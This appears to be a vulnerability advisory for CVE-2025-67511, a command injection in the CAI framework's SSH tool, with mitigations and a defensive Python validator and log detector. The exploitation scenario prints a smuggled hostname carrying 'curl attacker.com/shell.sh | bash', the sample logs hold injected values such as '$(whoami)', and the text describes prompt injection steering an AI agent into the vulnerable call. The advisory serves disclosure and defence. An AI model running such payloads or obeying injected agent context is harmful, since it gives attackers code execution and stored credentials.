If your security operations team is using the CAI framework (cai-framework pip package <= 0.5.9), stop using it for automated SSH operations immediately — there is no official patch available. The critical risk here is a prompt injection chain: an adversary tricks the AI agent into calling the vulnerable SSH function with injected username/host/port values, achieving arbitrary command execution on the host running your security tooling. Verify your pip environment and pin or remove the package until a patched version ships.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| cai-framework | pip | <= 0.5.9 | No patch |
| cybersecurity_ai | — | — | No patch |
Severity & Risk
Recommended Action
1. IMMEDIATE: Audit pip environments for cai-framework <= 0.5.9 across all systems. Run: pip show cai-framework
2. WORKAROUND: Disable or remove run_ssh_command_with_credentials() from agent tool definitions if you cannot remove the package. Add input validation or allowlisting for username (alphanumeric only), host (IP/FQDN regex), and port (numeric 1-65535) at the wrapper level.
3. PATCH: Monitor the upstream commit 09ccb6e0baccf56c40e6cb429c698750843a999c and GHSA-4c65-9gqf-4w8h for an official release — the fix exists in source but has not been packaged.
4. DETECTION: Alert on anomalous process execution spawned by the CAI agent process. Look for shell metacharacters (;, |, &, $, backticks) in SSH connection parameters logged by the framework.
5. CONTAINMENT: Run CAI agents in isolated containers with restricted outbound network and minimal host privileges (no root, no credential store access).
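The wrapper-level allowlisting from step 2 and the metacharacter check from step 4, as an added example that is not code from the CAI project. The validators, build_ssh_argv(), the ssh_connect log format and the sample log lines are all assumptions constructed for this illustration; the point is that every caller-supplied parameter is validated and the SSH process is started from an argv list rather than a shell string, so a hostname or port that carries shell syntax is rejected before any process is spawned.

```python
"""Added example, not code from the CAI project: an allowlist wrapper for the
SSH connection parameters and a detector for the metacharacters the advisory
says to alert on. The validators, build_ssh_argv(), the ssh_connect log
format and the sample log lines are all constructed for this illustration."""
import ipaddress
import re
from typing import List, Tuple

# Allowlists: username alphanumeric (plus '_' and '-'), host an IP literal or
# an RFC 1123 style hostname/FQDN, port an integer in 1-65535.
_USERNAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
# The characters the Recommended Action says to look for in logged parameters.
SHELL_METACHARS = set(";|&$`\n")


class UnsafeParameter(ValueError):
    """A connection parameter failed the allowlist."""


def validate_username(username: str) -> str:
    if not _USERNAME_RE.fullmatch(username):
        raise UnsafeParameter(f"username rejected: {username!r}")
    return username


def validate_host(host: str) -> str:
    try:
        ipaddress.ip_address(host)  # accepts IPv4 and IPv6 literals
        return host
    except ValueError:
        pass
    if not _HOSTNAME_RE.fullmatch(host):
        raise UnsafeParameter(f"host rejected: {host!r}")
    return host


def validate_port(port) -> int:
    try:
        number = int(str(port).strip(), 10)
    except ValueError:
        raise UnsafeParameter(f"port rejected: {port!r}") from None
    if not 1 <= number <= 65535:
        raise UnsafeParameter(f"port out of range: {number}")
    return number


def build_ssh_argv(username: str, host: str, port, command: str) -> List[str]:
    """Validate every caller-supplied parameter, then return an argv list meant
    for subprocess.run() without shell=True, so nothing here is parsed by a
    local shell. Escaping only some fields (the gap the advisory describes) is
    replaced by validating all of them and avoiding the shell entirely."""
    return [
        "ssh",
        "-p", str(validate_port(port)),
        f"{validate_username(username)}@{validate_host(host)}",
        command,
    ]


# Constructed log format (assumption): each connection attempt is logged as
#   ... ssh_connect user="..." host="..." port="..."
_LOG_RE = re.compile(
    r'ssh_connect user="(?P<user>[^"]*)" host="(?P<host>[^"]*)" port="(?P<port>[^"]*)"'
)
_VALIDATORS = {"user": validate_username, "host": validate_host, "port": validate_port}


def find_suspicious_ssh_params(log_lines) -> List[Tuple[int, str, str]]:
    """Return (line_number, field, value) for every logged parameter that
    carries a shell metacharacter or otherwise fails its allowlist."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = _LOG_RE.search(line)
        if not match:
            continue
        for field, value in match.groupdict().items():
            if SHELL_METACHARS & set(value):
                hits.append((number, field, value))
                continue
            try:
                _VALIDATORS[field](value)
            except UnsafeParameter:
                hits.append((number, field, value))
    return hits


# Constructed sample log lines (not real CAI output).
SAMPLE_LOG = [
    '2025-12-10T10:00:01Z cai.tools ssh_connect user="analyst" host="10.0.0.5" port="22"',
    '2025-12-10T10:00:07Z cai.tools ssh_connect user="analyst" host="scan-01.corp.example; id" port="22"',
    '2025-12-10T10:00:09Z cai.tools ssh_connect user="analyst$(whoami)" host="scan-02.corp.example" port="22"',
    '2025-12-10T10:00:12Z cai.tools ssh_connect user="analyst" host="scan-03.corp.example" port="22 & true"',
    '2025-12-10T10:00:15Z cai.tools ssh_connect user="analyst" host="scan-04.corp.example" port="70000"',
]

if __name__ == "__main__":
    print(build_ssh_argv("analyst", "10.0.0.5", "22", "uname -a"))
    for hit in find_suspicious_ssh_params(SAMPLE_LOG):
        print("ALERT line %d: %s=%r" % hit)
```

Run as a script it prints the argv list for a clean connection and one ALERT line for each of the four constructed bad entries (a host with a trailing command, a username with command substitution, a port with an ampersand, and an out-of-range port). The last case is the reason the detector also re-runs the allowlist rather than only scanning for metacharacters: a value can be well-formed shell text and still be outside what the wrapper should ever pass to ssh.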
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
Cybersecurity AI (CAI) is an open-source framework for building and deploying AI-powered offensive and defensive automation. Versions 0.5.9 and below are vulnerable to Command Injection through the run_ssh_command_with_credentials() function, which is available to AI agents. Only password and command inputs are escaped in run_ssh_command_with_credentials to prevent shell injection, while username, host and port values are injectable. This issue does not have a fix at the time of publication.
Exploitation Scenario
An adversary conducting a penetration test or red team engagement using CAI <= 0.5.9 targets a security operations team also running CAI.
- Step 1: Attacker crafts a malicious target hostname — e.g., 'victim.com; curl attacker.com/shell.sh | bash' — and delivers it through a channel the victim's CAI agent will process (phishing lure, poisoned scan target list, or indirect prompt injection via agent context).
- Step 2: The CAI agent invokes run_ssh_command_with_credentials() with the attacker-controlled host value.
- Step 3: Because host is not sanitized, the shell executes both the SSH command and the injected payload.
- Step 4: Attacker achieves RCE on the machine running the security team's AI agent, potentially inheriting all stored SSH credentials and access to internal networks the agent was managing.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
References
- github.com/advisories/GHSA-4c65-9gqf-4w8h
- github.com/aliasrobotics/cai/commit/09ccb6e0baccf56c40e6cb429c698750843a999c (Patch)
- github.com/aliasrobotics/cai/security/advisories/GHSA-4c65-9gqf-4w8h (Exploit, Vendor)
- nvd.nist.gov/vuln/detail/CVE-2025-67511
- hacktivesecurity.com/blog/2025/12/10/cve-2025-67511-tricking-a-security-ai-agent-into-pwning-itself (Exploit, Press/Media Coverage, 3rd Party)